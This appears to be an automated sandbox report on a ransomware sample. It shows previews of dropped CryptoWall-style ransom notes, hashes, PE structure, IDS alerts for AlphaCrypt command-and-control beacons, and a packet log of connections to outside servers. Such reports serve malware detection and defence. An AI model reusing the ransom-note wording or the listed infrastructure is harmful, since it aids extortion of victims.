                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\Public\Videos\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\Public\Videos\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          Static File Info

                                                                                                                          General

                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Entropy (8bit):7.522628705686142
                                                                                                                          TrID:
                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                          File name:0t8amSU3vd.exe
                                                                                                                          File size:217'109 bytes
                                                                                                                          MD5:ed98ce8f541e6871d1f39943ce09dfa3
                                                                                                                          SHA1:1fa08e8ce2c70daf4a3456eb53e48484b20d3d12
                                                                                                                          SHA256:ad340c9ea5510d1f0f6149fae0bd5349d6e8b01df4eccc9a2bb300be4bc9d981
                                                                                                                          SHA512:6847b69b8a9d913b46c1abfb0f1ba91070999cda1bd3df6c8229cfdc4b052dc25102d2353548ab436f361083cf9be5836f118ab508e2deb3ffdbfdf286b847aa
                                                                                                                          SSDEEP:6144:0/kdfrM7AyEfU60/IzCsRzxGmw5oCmK2fk7mzBW+g:aks60/KCs5vL9K2fk7mzBg
                                                                                                                          TLSH:F724F002287BAA6FF0D375789F0F432690B6EC21AD96F1474616F58D4CC23277AB6E14
                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be.(.. in DOS mode....$..........>...m...m...m...m...m...m...m...m...m...m...ma..m...ma..m...m...m...m...m...m...m...mRich...m................PE..L....FuC...

                                                                                                                          File Icon

                                                                                                                          Icon Hash:aaf3e3e3918382a0

                                                                                                                          Static PE Info

                                                                                                                          General

                                                                                                                          Entrypoint:0x430382
                                                                                                                          Entrypoint Section:.text
                                                                                                                          Digitally signed:false
                                                                                                                          Imagebase:0x400000
                                                                                                                          Subsystem:windows gui
                                                                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                          DLL Characteristics:
                                                                                                                          Time Stamp:0x4375461C [Sat Nov 12 01:32:12 2005 UTC]
                                                                                                                          TLS Callbacks:
                                                                                                                          CLR (.Net) Version:
                                                                                                                          OS Version Major:4
                                                                                                                          OS Version Minor:0
                                                                                                                          File Version Major:4
                                                                                                                          File Version Minor:0
                                                                                                                          Subsystem Version Major:4
                                                                                                                          Subsystem Version Minor:0
                                                                                                                          Import Hash:385b6b380b04c32dbf0bf10a4d80a578

                                                                                                                          Entrypoint Preview

                                                                                                                          Instruction
                                                                                                                          push ebp
                                                                                                                          mov ebp, esp
                                                                                                                          push FFFFFFFFh
                                                                                                                          push 00431138h
                                                                                                                          push 00430510h
                                                                                                                          mov eax, dword ptr fs:[00000000h]
                                                                                                                          push eax
                                                                                                                          mov dword ptr fs:[00000000h], esp
                                                                                                                          sub esp, 68h
                                                                                                                          push ebx
                                                                                                                          push esi
                                                                                                                          push edi
                                                                                                                          mov dword ptr [ebp-18h], esp
                                                                                                                          xor ebx, ebx
                                                                                                                          mov dword ptr [ebp-04h], ebx
                                                                                                                          push 00000002h
                                                                                                                          call dword ptr [00431020h]
                                                                                                                          pop ecx
                                                                                                                          or dword ptr [005170C4h], FFFFFFFFh
                                                                                                                          or dword ptr [005170C8h], FFFFFFFFh
                                                                                                                          call dword ptr [00431048h]
                                                                                                                          mov ecx, dword ptr [005170C0h]
                                                                                                                          mov dword ptr [eax], ecx
                                                                                                                          call dword ptr [00431024h]
                                                                                                                          mov ecx, dword ptr [005170BCh]
                                                                                                                          mov dword ptr [eax], ecx
                                                                                                                          mov eax, dword ptr [00431028h]
                                                                                                                          mov eax, dword ptr [eax]
                                                                                                                          mov dword ptr [005170CCh], eax
                                                                                                                          call 00007F6A84E76A55h
                                                                                                                          cmp dword ptr [004330A8h], ebx
                                                                                                                          jne 00007F6A84E7694Eh
                                                                                                                          push 004304FEh
                                                                                                                          call dword ptr [0043102Ch]
                                                                                                                          pop ecx
                                                                                                                          call 00007F6A84E76A27h
                                                                                                                          push 0043200Ch
                                                                                                                          push 00432008h
                                                                                                                          call 00007F6A84E76A12h
                                                                                                                          mov eax, dword ptr [005170B8h]
                                                                                                                          mov dword ptr [ebp-6Ch], eax
                                                                                                                          lea eax, dword ptr [ebp-6Ch]
                                                                                                                          push eax
                                                                                                                          push dword ptr [005170B4h]
                                                                                                                          lea eax, dword ptr [ebp-64h]
                                                                                                                          push eax
                                                                                                                          lea eax, dword ptr [ebp-70h]
                                                                                                                          push eax
                                                                                                                          lea eax, dword ptr [ebp-60h]
                                                                                                                          push eax
                                                                                                                          call dword ptr [00431034h]
                                                                                                                          push 00432004h
                                                                                                                          push 00432000h
                                                                                                                          call 00007F6A84E769DFh

                                                                                                                          Rich Headers

                                                                                                                          Programming Language:
                                                                                                                          • [ C ] VS98 (6.0) build 8168

                                                                                                                          Data Directories

                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x311440xc8.rdata
                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x1180000xab0.rsrc
                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x310000x134.rdata
                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                          Sections

                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                          .text0x10000x2f5220x3000024167d9ee8d5aea75d7b45962226fc2aFalse0.8856964111328125data7.771301677112809IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                          .rdata0x310000x8de0x1000708a5fcf10cc2fd89816537b49b20c91False0.2880859375OpenPGP Secret Key Version 33.5125682428768963IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                          .data0x320000xe50d00x2000083cba5fe4191acfed11531a48e8194eFalse0.364013671875Matlab v4 mat-file (little endian) \", numeric, rows 0, columns 03.2714286750301156IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                          .rsrc0x1180000xab00x10007e4ebe48e00149cf33d7a7f7bd6d2f50False0.3388671875data2.9923974347632347IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                          Resources

                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                          RT_DIALOG0x1186e80xe8dataEnglishIndia0.771551724137931
                                                                                                                          RT_DIALOG0x1187d00xecdataEnglishIndia0.7711864406779662
                                                                                                                          RT_DIALOG0x1188c00x104dataEnglishIndia0.7538461538461538
                                                                                                                          RT_DIALOG0x1189c80xe4dataEnglishIndia0.7675438596491229
                                                                                                                          RT_ACCELERATOR0x1183c00x38dataEnglishIndia1.0714285714285714
                                                                                                                          RT_ACCELERATOR0x1183f80x30dataEnglishIndia1.0833333333333333
                                                                                                                          RT_VERSION0x1184280x2bcdataEnglishIndia0.4957142857142857
                                                                                                                          RT_HTML0x1183a00x1dASCII text, with no line terminatorsEnglishIndia1.2758620689655173
                                                                                                                          RT_MANIFEST0x1182400x15aASCII text, with CRLF line terminatorsEnglishIndia0.5491329479768786

                                                                                                                          Imports

                                                                                                                          DLLImport
                                                                                                                          OLEAUT32.dllSetErrorInfo
                                                                                                                          comdlg32.dllFindTextW, CommDlgExtendedError, GetFileTitleA
                                                                                                                          ole32.dllStgOpenStorageEx, CoDisconnectObject, StgGetIFillLockBytesOnILockBytes, HBITMAP_UserUnmarshal, OleCreateFromDataEx, StgGetIFillLockBytesOnFile, CoRegisterMessageFilter, HACCEL_UserUnmarshal, CoTreatAsClass, OleSetMenuDescriptor, HWND_UserFree, OleTranslateAccelerator, STGMEDIUM_UserSize, CoFileTimeNow, CoGetStdMarshalEx, CreateStreamOnHGlobal, CoReleaseMarshalData, StgOpenStorageOnILockBytes, OleCreateFromFileEx, OleSetClipboard, OleRegEnumVerbs, CoTaskMemFree, StgCreateDocfile, OleUninitialize, StgOpenPropStg, OleConvertIStorageToOLESTREAM, IIDFromString, SNB_UserMarshal, HGLOBAL_UserMarshal, OleCreateLinkFromData, RevokeDragDrop, CoRegisterPSClsid, StgOpenStorage, FreePropVariantArray, CoGetPSClsid, CoUnmarshalHresult, SetConvertStg, WriteClassStg, CoResumeClassObjects, OleConvertOLESTREAMToIStorage, CoGetCurrentProcess, CreateAntiMoniker, StringFromGUID2
                                                                                                                          VERSION.dllVerQueryValueW, GetFileVersionInfoSizeW
                                                                                                                          KERNEL32.dllGetModuleHandleA, GetStartupInfoA, DuplicateHandle
                                                                                                                          MSVCRT.dll_controlfp, _except_handler3, __set_app_type, __p__commode, _adjust_fdiv, __setusermatherr, _initterm, __getmainargs, _acmdln, exit, _XcptFilter, _exit, __p__fmode
                                                                                                                          WINSPOOL.DRVSetPortA
                                                                                                                          SHELL32.dllExtractIconExA
                                                                                                                          COMCTL32.dllImageList_AddMasked

                                                                                                                          Possible Origin

                                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                                          EnglishIndia

                                                                                                                          Network Behavior

                                                                                                                          Suricata IDS Alerts

                                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                          2025-01-08T21:09:37.821207+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.224916334.117.59.8180TCP
                                                                                                                          2025-01-08T21:09:59.404903+01002021723ET MALWARE AlphaCrypt CnC Beacon 31192.168.2.2249164199.116.254.16980TCP
                                                                                                                          2025-01-08T21:09:59.404903+01002813018ETPRO MALWARE AlphaCrypt CnC Beacon 41192.168.2.2249164199.116.254.16980TCP
                                                                                                                          2025-01-08T21:10:02.476308+01002021723ET MALWARE AlphaCrypt CnC Beacon 31192.168.2.2249165185.230.63.17180TCP
                                                                                                                          2025-01-08T21:10:02.476308+01002813018ETPRO MALWARE AlphaCrypt CnC Beacon 41192.168.2.2249165185.230.63.17180TCP
                                                                                                                          2025-01-08T21:10:03.336051+01002021723ET MALWARE AlphaCrypt CnC Beacon 31192.168.2.2249166185.230.63.171443TCP
                                                                                                                          2025-01-08T21:10:04.741113+01002021723ET MALWARE AlphaCrypt CnC Beacon 31192.168.2.224916734.149.87.45443TCP
                                                                                                                          2025-01-08T21:10:05.429191+01002021723ET MALWARE AlphaCrypt CnC Beacon 31192.168.2.224916867.22.44.280TCP
                                                                                                                          2025-01-08T21:10:05.429191+01002813018ETPRO MALWARE AlphaCrypt CnC Beacon 41192.168.2.224916867.22.44.280TCP
                                                                                                                          2025-01-08T21:10:08.210773+01002812134ETPRO MALWARE AlphaCrypt .onion Proxy Domain1192.168.2.22639268.8.8.853UDP
                                                                                                                          2025-01-08T21:10:08.228147+01002812134ETPRO MALWARE AlphaCrypt .onion Proxy Domain1192.168.2.22655108.8.8.853UDP

                                                                                                                          Network Port Distribution

                                                                                                                          TCP Packets

                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                          Jan 8, 2025 21:09:37.340986013 CET4916380192.168.2.2234.117.59.81
                                                                                                                          Jan 8, 2025 21:09:37.345777035 CET804916334.117.59.81192.168.2.22
                                                                                                                          Jan 8, 2025 21:09:37.345861912 CET4916380192.168.2.2234.117.59.81
                                                                                                                          Jan 8, 2025 21:09:37.346493006 CET4916380192.168.2.2234.117.59.81
                                                                                                                          Jan 8, 2025 21:09:37.351797104 CET804916334.117.59.81192.168.2.22
                                                                                                                          Jan 8, 2025 21:09:37.818933964 CET804916334.117.59.81192.168.2.22
                                                                                                                          Jan 8, 2025 21:09:37.821207047 CET4916380192.168.2.2234.117.59.81
                                                                                                                          Jan 8, 2025 21:09:38.024696112 CET4916480192.168.2.22199.116.254.169
                                                                                                                          Jan 8, 2025 21:09:38.029566050 CET8049164199.116.254.169192.168.2.22
                                                                                                                          Jan 8, 2025 21:09:38.029639959 CET4916480192.168.2.22199.116.254.169
                                                                                                                          Jan 8, 2025 21:09:38.033674002 CET4916480192.168.2.22199.116.254.169
                                                                                                                          Jan 8, 2025 21:09:38.038470984 CET8049164199.116.254.169192.168.2.22
                                                                                                                          Jan 8, 2025 21:09:59.404836893 CET8049164199.116.254.169192.168.2.22
                                                                                                                          Jan 8, 2025 21:09:59.404902935 CET4916480192.168.2.22199.116.254.169
                                                                                                                          Jan 8, 2025 21:09:59.404994965 CET4916480192.168.2.22199.116.254.169
                                                                                                                          Jan 8, 2025 21:09:59.409734964 CET8049164199.116.254.169192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:02.006221056 CET4916580192.168.2.22185.230.63.171
                                                                                                                          Jan 8, 2025 21:10:02.011075974 CET8049165185.230.63.171192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:02.011190891 CET4916580192.168.2.22185.230.63.171
                                                                                                                          Jan 8, 2025 21:10:02.023974895 CET4916580192.168.2.22185.230.63.171
                                                                                                                          Jan 8, 2025 21:10:02.028844118 CET8049165185.230.63.171192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:02.476206064 CET8049165185.230.63.171192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:02.476254940 CET8049165185.230.63.171192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:02.476308107 CET4916580192.168.2.22185.230.63.171
                                                                                                                          Jan 8, 2025 21:10:02.476402998 CET4916580192.168.2.22185.230.63.171
                                                                                                                          Jan 8, 2025 21:10:02.476402998 CET4916580192.168.2.22185.230.63.171
                                                                                                                          Jan 8, 2025 21:10:02.481220961 CET8049165185.230.63.171192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:02.526457071 CET49166443192.168.2.22185.230.63.171
                                                                                                                          Jan 8, 2025 21:10:02.526485920 CET44349166185.230.63.171192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:02.526536942 CET49166443192.168.2.22185.230.63.171
                                                                                                                          Jan 8, 2025 21:10:02.536335945 CET49166443192.168.2.22185.230.63.171
                                                                                                                          Jan 8, 2025 21:10:02.536349058 CET44349166185.230.63.171192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:03.041240931 CET44349166185.230.63.171192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:03.041500092 CET49166443192.168.2.22185.230.63.171
                                                                                                                          Jan 8, 2025 21:10:03.046560049 CET49166443192.168.2.22185.230.63.171
                                                                                                                          Jan 8, 2025 21:10:03.046569109 CET44349166185.230.63.171192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:03.046865940 CET44349166185.230.63.171192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:03.047835112 CET49166443192.168.2.22185.230.63.171
                                                                                                                          Jan 8, 2025 21:10:03.131793022 CET49166443192.168.2.22185.230.63.171
                                                                                                                          Jan 8, 2025 21:10:03.175334930 CET44349166185.230.63.171192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:03.336096048 CET44349166185.230.63.171192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:03.336226940 CET44349166185.230.63.171192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:03.336262941 CET49166443192.168.2.22185.230.63.171
                                                                                                                          Jan 8, 2025 21:10:03.336352110 CET49166443192.168.2.22185.230.63.171
                                                                                                                          Jan 8, 2025 21:10:03.336352110 CET49166443192.168.2.22185.230.63.171
                                                                                                                          Jan 8, 2025 21:10:03.388891935 CET49167443192.168.2.2234.149.87.45
                                                                                                                          Jan 8, 2025 21:10:03.388938904 CET4434916734.149.87.45192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:03.389007092 CET49167443192.168.2.2234.149.87.45
                                                                                                                          Jan 8, 2025 21:10:03.389302015 CET49167443192.168.2.2234.149.87.45
                                                                                                                          Jan 8, 2025 21:10:03.389314890 CET4434916734.149.87.45192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:03.706938982 CET49166443192.168.2.22185.230.63.171
                                                                                                                          Jan 8, 2025 21:10:03.706955910 CET44349166185.230.63.171192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:03.853247881 CET4434916734.149.87.45192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:03.853333950 CET49167443192.168.2.2234.149.87.45
                                                                                                                          Jan 8, 2025 21:10:03.888041019 CET49167443192.168.2.2234.149.87.45
                                                                                                                          Jan 8, 2025 21:10:03.888067961 CET4434916734.149.87.45192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:03.888427973 CET4434916734.149.87.45192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:03.888478041 CET49167443192.168.2.2234.149.87.45
                                                                                                                          Jan 8, 2025 21:10:03.898015976 CET49167443192.168.2.2234.149.87.45
                                                                                                                          Jan 8, 2025 21:10:03.943341970 CET4434916734.149.87.45192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:04.741127014 CET4434916734.149.87.45192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:04.741194010 CET4434916734.149.87.45192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:04.741256952 CET4434916734.149.87.45192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:04.741329908 CET4434916734.149.87.45192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:04.741374969 CET49167443192.168.2.2234.149.87.45
                                                                                                                          Jan 8, 2025 21:10:04.741374969 CET49167443192.168.2.2234.149.87.45
                                                                                                                          Jan 8, 2025 21:10:04.741374969 CET49167443192.168.2.2234.149.87.45
                                                                                                                          Jan 8, 2025 21:10:04.741461039 CET49167443192.168.2.2234.149.87.45
                                                                                                                          Jan 8, 2025 21:10:04.742603064 CET49167443192.168.2.2234.149.87.45
                                                                                                                          Jan 8, 2025 21:10:04.742621899 CET4434916734.149.87.45192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:04.742633104 CET49167443192.168.2.2234.149.87.45
                                                                                                                          Jan 8, 2025 21:10:04.742683887 CET49167443192.168.2.2234.149.87.45
                                                                                                                          Jan 8, 2025 21:10:04.787554026 CET4916880192.168.2.2267.22.44.2
                                                                                                                          Jan 8, 2025 21:10:04.792347908 CET804916867.22.44.2192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:04.792421103 CET4916880192.168.2.2267.22.44.2
                                                                                                                          Jan 8, 2025 21:10:04.792625904 CET4916880192.168.2.2267.22.44.2
                                                                                                                          Jan 8, 2025 21:10:04.797411919 CET804916867.22.44.2192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:05.425394058 CET804916867.22.44.2192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:05.429191113 CET4916880192.168.2.2267.22.44.2
                                                                                                                          Jan 8, 2025 21:10:05.457369089 CET4916980192.168.2.2267.22.44.2
                                                                                                                          Jan 8, 2025 21:10:05.462261915 CET804916967.22.44.2192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:05.465137005 CET4916980192.168.2.2267.22.44.2
                                                                                                                          Jan 8, 2025 21:10:05.465303898 CET4916980192.168.2.2267.22.44.2
                                                                                                                          Jan 8, 2025 21:10:05.470077038 CET804916967.22.44.2192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:06.091027975 CET804916967.22.44.2192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:06.091058016 CET804916967.22.44.2192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:06.091075897 CET804916967.22.44.2192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:06.091089964 CET804916967.22.44.2192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:06.091093063 CET4916980192.168.2.2267.22.44.2
                                                                                                                          Jan 8, 2025 21:10:06.091124058 CET4916980192.168.2.2267.22.44.2
                                                                                                                          Jan 8, 2025 21:10:06.091124058 CET4916980192.168.2.2267.22.44.2
                                                                                                                          Jan 8, 2025 21:10:06.091161966 CET804916967.22.44.2192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:06.091178894 CET804916967.22.44.2192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:06.091204882 CET4916980192.168.2.2267.22.44.2
                                                                                                                          Jan 8, 2025 21:10:06.091219902 CET804916967.22.44.2192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:06.091219902 CET4916980192.168.2.2267.22.44.2
                                                                                                                          Jan 8, 2025 21:10:06.091233015 CET804916967.22.44.2192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:06.091260910 CET4916980192.168.2.2267.22.44.2
                                                                                                                          Jan 8, 2025 21:10:06.091270924 CET4916980192.168.2.2267.22.44.2
                                                                                                                          Jan 8, 2025 21:10:06.091295958 CET804916967.22.44.2192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:06.091309071 CET804916967.22.44.2192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:06.091340065 CET4916980192.168.2.2267.22.44.2
                                                                                                                          Jan 8, 2025 21:10:06.091629028 CET4916980192.168.2.2267.22.44.2
                                                                                                                          Jan 8, 2025 21:10:06.091694117 CET4916980192.168.2.2267.22.44.2
                                                                                                                          Jan 8, 2025 21:10:06.091726065 CET4916980192.168.2.2267.22.44.2
                                                                                                                          Jan 8, 2025 21:10:06.095966101 CET804916967.22.44.2192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:06.095992088 CET804916967.22.44.2192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:06.096012115 CET4916980192.168.2.2267.22.44.2
                                                                                                                          Jan 8, 2025 21:10:06.096023083 CET4916980192.168.2.2267.22.44.2
                                                                                                                          Jan 8, 2025 21:10:08.241554022 CET49170443192.168.2.22103.198.0.111
                                                                                                                          Jan 8, 2025 21:10:08.241601944 CET44349170103.198.0.111192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:08.241652012 CET49170443192.168.2.22103.198.0.111
                                                                                                                          Jan 8, 2025 21:10:08.242950916 CET49170443192.168.2.22103.198.0.111
                                                                                                                          Jan 8, 2025 21:10:08.242961884 CET44349170103.198.0.111192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:14.419737101 CET804916867.22.44.2192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:14.419784069 CET4916880192.168.2.2267.22.44.2
                                                                                                                          Jan 8, 2025 21:10:29.120671988 CET49170443192.168.2.22103.198.0.111
                                                                                                                          Jan 8, 2025 21:11:07.784815073 CET49176443192.168.2.22172.217.168.68
                                                                                                                          Jan 8, 2025 21:11:07.784858942 CET44349176172.217.168.68192.168.2.22
                                                                                                                          Jan 8, 2025 21:11:07.784909010 CET49176443192.168.2.22172.217.168.68
                                                                                                                          Jan 8, 2025 21:11:07.785192013 CET49176443192.168.2.22172.217.168.68
                                                                                                                          Jan 8, 2025 21:11:07.785203934 CET44349176172.217.168.68192.168.2.22
                                                                                                                          Jan 8, 2025 21:11:08.457041025 CET44349176172.217.168.68192.168.2.22
                                                                                                                          Jan 8, 2025 21:11:08.457396030 CET49176443192.168.2.22172.217.168.68
                                                                                                                          Jan 8, 2025 21:11:08.457411051 CET44349176172.217.168.68192.168.2.22
                                                                                                                          Jan 8, 2025 21:11:08.458561897 CET44349176172.217.168.68192.168.2.22
                                                                                                                          Jan 8, 2025 21:11:08.458656073 CET49176443192.168.2.22172.217.168.68
                                                                                                                          Jan 8, 2025 21:11:08.459753036 CET49176443192.168.2.22172.217.168.68
                                                                                                                          Jan 8, 2025 21:11:08.459861040 CET44349176172.217.168.68192.168.2.22
                                                                                                                          Jan 8, 2025 21:11:08.667342901 CET44349176172.217.168.68192.168.2.22
                                                                                                                          Jan 8, 2025 21:11:08.667557001 CET49176443192.168.2.22172.217.168.68
                                                                                                                          Jan 8, 2025 21:11:18.356173992 CET44349176172.217.168.68192.168.2.22
                                                                                                                          Jan 8, 2025 21:11:18.356245995 CET44349176172.217.168.68192.168.2.22
